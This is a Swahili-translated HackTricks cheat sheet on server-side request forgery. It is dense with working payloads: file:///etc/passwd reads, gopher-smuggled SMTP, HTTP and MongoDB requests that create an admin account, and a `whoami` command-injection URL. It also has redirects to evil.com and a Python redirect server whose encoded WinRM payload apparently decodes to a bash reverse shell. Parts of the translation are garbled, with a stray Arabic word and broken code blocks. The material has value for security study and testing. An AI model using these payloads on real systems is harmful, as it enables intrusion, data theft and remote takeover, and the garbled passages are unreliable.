Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

SSRF (Server Side Request Forgery)

Tumia Trickest kujenga na kujiendesha kiotomatiki kazi zinazotolewa na zana za jamii za kisasa zaidi duniani. Pata Ufikiaji Leo:

LogoAutomate OffSec, EASM, and Custom Security Processes | Trickest

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Taarifa za Msingi

Ukiukaji wa Server-side Request Forgery (SSRF) hutokea wakati mshambuliaji anaposhawishi programu ya upande wa seva kufanya maombi ya HTTP kwa kikoa chochote anachochagua. Ukiukaji huu unafichua seva kwa maombi ya nje yasiyo na mipaka yanayoelekezwa na mshambuliaji.

Kamatia SSRF

Jambo la kwanza unahitaji kufanya ni kukamata mwingiliano wa SSRF ulioanzishwa na wewe. Ili kukamata mwingiliano wa HTTP au DNS unaweza kutumia zana kama:

Bypass ya Domains Zilizoorodheshwa

Kwa kawaida utaona kuwa SSRF inafanya kazi tu katika kikoa fulani kilichoorodheshwa au URL. Katika ukurasa ufuatao una mkusanyiko wa mbinu za kujaribu kupita hiyo orodha:

URL Format Bypass

Kupita kupitia mwelekeo wazi

Ikiwa seva imekingwa ipasavyo unaweza kupita vizuizi vyote kwa kutumia Mwelekeo Wazi ndani ya ukurasa wa wavuti. Kwa sababu ukurasa wa wavuti utaruhusu SSRF kwa kikoa hicho hicho na labda uta fuata mwelekeo, unaweza kutumia Mwelekeo Wazi kufanya seva kufikia rasilimali yoyote ya ndani. Soma zaidi hapa: https://portswigger.net/web-security/ssrf

Protokali

  • file://

  • Mpango wa URL file:// unarejelea, ukielekeza moja kwa moja kwa /etc/passwd: file:///etc/passwd

  • dict://

  • Mpango wa URL wa DICT un وصف kama unavyotumika kwa kufikia maelezo au orodha za maneno kupitia protokali ya DICT. Mfano uliopewa unaonyesha URL iliyojengwa ikilenga neno maalum, hifadhidata, na nambari ya kuingia, pamoja na mfano wa skripti ya PHP inayoweza kutumika vibaya kuungana na seva ya DICT kwa kutumia akidi zilizotolewa na mshambuliaji: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>

  • SFTP://

  • Imeainishwa kama protokali ya uhamishaji wa faili salama kupitia shell salama, mfano umepewa unaonyesha jinsi skripti ya PHP inaweza kutumika vibaya kuungana na seva ya SFTP mbaya: url=sftp://generic.com:11111/

  • TFTP://

  • Protokali ya Uhamishaji wa Faili Rahisi, inayofanya kazi juu ya UDP, inatajwa na mfano wa skripti ya PHP iliyoundwa kutuma ombi kwa seva ya TFTP. Ombi la TFTP linafanywa kwa 'generic.com' kwenye bandari '12346' kwa faili 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET

  • LDAP://

  • Sehemu hii inashughulikia Protokali ya Upatikanaji wa Katalogi Nyepesi, ikisisitiza matumizi yake katika kusimamia na kufikia huduma za habari za katalogi zilizogawanywa kupitia mitandao ya IP. Shirikiana na seva ya LDAP kwenye localhost: '%0astats%0aquit' kupitia ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.

  • SMTP

  • Njia inaelezewa kwa kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufichua majina ya kikoa cha ndani na hatua zaidi za uchunguzi kulingana na habari hiyo.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

  • Curl URL globbing - WAF bypass

  • Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kuwa na manufaa katika kupita WAFs. Kwa mfano katika hii writeup unaweza kupata mfano huu wa path traversal kupitia file protocol:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

  • Gopher://

  • Uwezo wa itifaki ya Gopher wa kubainisha IP, bandari, na bytes kwa mawasiliano ya seva unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa ajili ya kuunda payloads. Matumizi mawili tofauti yanaonyeshwa:

Gopher://

Kwa kutumia itifaki hii unaweza kubainisha IP, bandari na bytes unazotaka seva itume. Kisha, unaweza kimsingi kutumia SSRF ili kuwasiliana na seva yoyote ya TCP (lakini unahitaji kujua jinsi ya kuzungumza na huduma hiyo kwanza). Kwa bahati nzuri, unaweza kutumia Gopherus kuunda payloads kwa huduma kadhaa. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa huduma za Java RMI.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Unganisha tena kwa 1337

redirect.php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB -- Unda mtumiaji mwenye jina la mtumiaji=admin na nenosiri=admin123 na ruhusa=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF kupitia kichwa cha Referrer & Mengineyo

Programu za uchanganuzi kwenye seva mara nyingi huandika kichwa cha Referrer ili kufuatilia viungo vinavyokuja, tabia ambayo kwa bahati mbaya inafichua programu kwa udhaifu wa Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu hizo zinaweza kutembelea URL za nje zilizotajwa katika kichwa cha Referrer ili kuchambua maudhui ya tovuti za rejeleo. Ili kugundua udhaifu hizi, nyongeza ya Burp Suite "Collaborator Everywhere" inapendekezwa, ikitumia njia ambavyo zana za uchanganuzi zinavyoshughulikia kichwa cha Referer ili kubaini maeneo yanayoweza kushambuliwa kwa SSRF.

SSRF kupitia data ya SNI kutoka kwa cheti

Usanidi mbaya ambao unaweza kuwezesha muunganisho na nyuma yoyote kupitia usanidi rahisi umeonyeshwa kwa mfano wa usanidi wa Nginx:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika usanidi huu, thamani kutoka kwa uwanja wa Server Name Indication (SNI) inatumika moja kwa moja kama anwani ya backend. Mipangilio hii inafichua udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kutaja tu anwani ya IP au jina la kikoa katika uwanja wa SNI. Mfano wa matumizi ili kulazimisha muunganisho na backend isiyo ya kawaida, kama internal.host.com, kwa kutumia amri ya openssl unapatikana hapa chini:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

Wget file upload

SSRF na Command Injection

Inaweza kuwa na faida kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFs Rendering

Ikiwa ukurasa wa wavuti unaunda kiotomatiki PDF na baadhi ya taarifa ulizotoa, unaweza kuingiza JS ambayo itatekelezwa na muundaji wa PDF mwenyewe (server) wakati wa kuunda PDF na utaweza kutumia SSRF. Pata maelezo zaidi hapa.

Kutoka SSRF hadi DoS

Unda vikao kadhaa na jaribu kupakua faili nzito ukitumia SSRF kutoka kwa vikao.

SSRF PHP Functions

Angalia ukurasa ufuatao kwa kazi za PHP zenye udhaifu na hata kazi za Wordpress:

PHP SSRF

SSRF Redirect to Gopher

Kwa baadhi ya matumizi unaweza kuhitaji kutuma jibu la kuhamasisha (inaweza kuwa kutumia protokali tofauti kama gopher). Hapa una misimbo tofauti ya python kujibu kwa kuhamasisha:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zikiwa na nguvu za zana za jamii za kisasa zaidi duniani. Pata Ufikiaji Leo:

LogoAutomate OffSec, EASM, and Custom Security Processes | Trickest

Proxies zisizo na mpangilio kwa SSRF

Hila kutoka kwenye chapisho hili.

Flask

Flask proxy vulnerable code

```python from flask import Flask from requests import get

app = Flask('main') SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''}) @app.route('/path:path')

def proxy(path): return get(f'{SITE_NAME}{path}').content

if name == "main": app.run(threaded=False)

</details>

Flask inaruhusu kutumia **`@`** kama herufi ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji wa mwanzo kuwa jina la mtumiaji** na kuingiza mpya. Ombi la shambulio:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Msimamo wa hatari:

Iligundulika kwamba inawezekana kuanza njia ya ombi kwa herufi ; ambayo inaruhusu kutumia kisha @ na kuingiza mwenyeji mpya ili kufikia. Ombi la shambulio:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server

PreviousSecond Order Injection - SQLMapNextURL Format Bypass

Last updated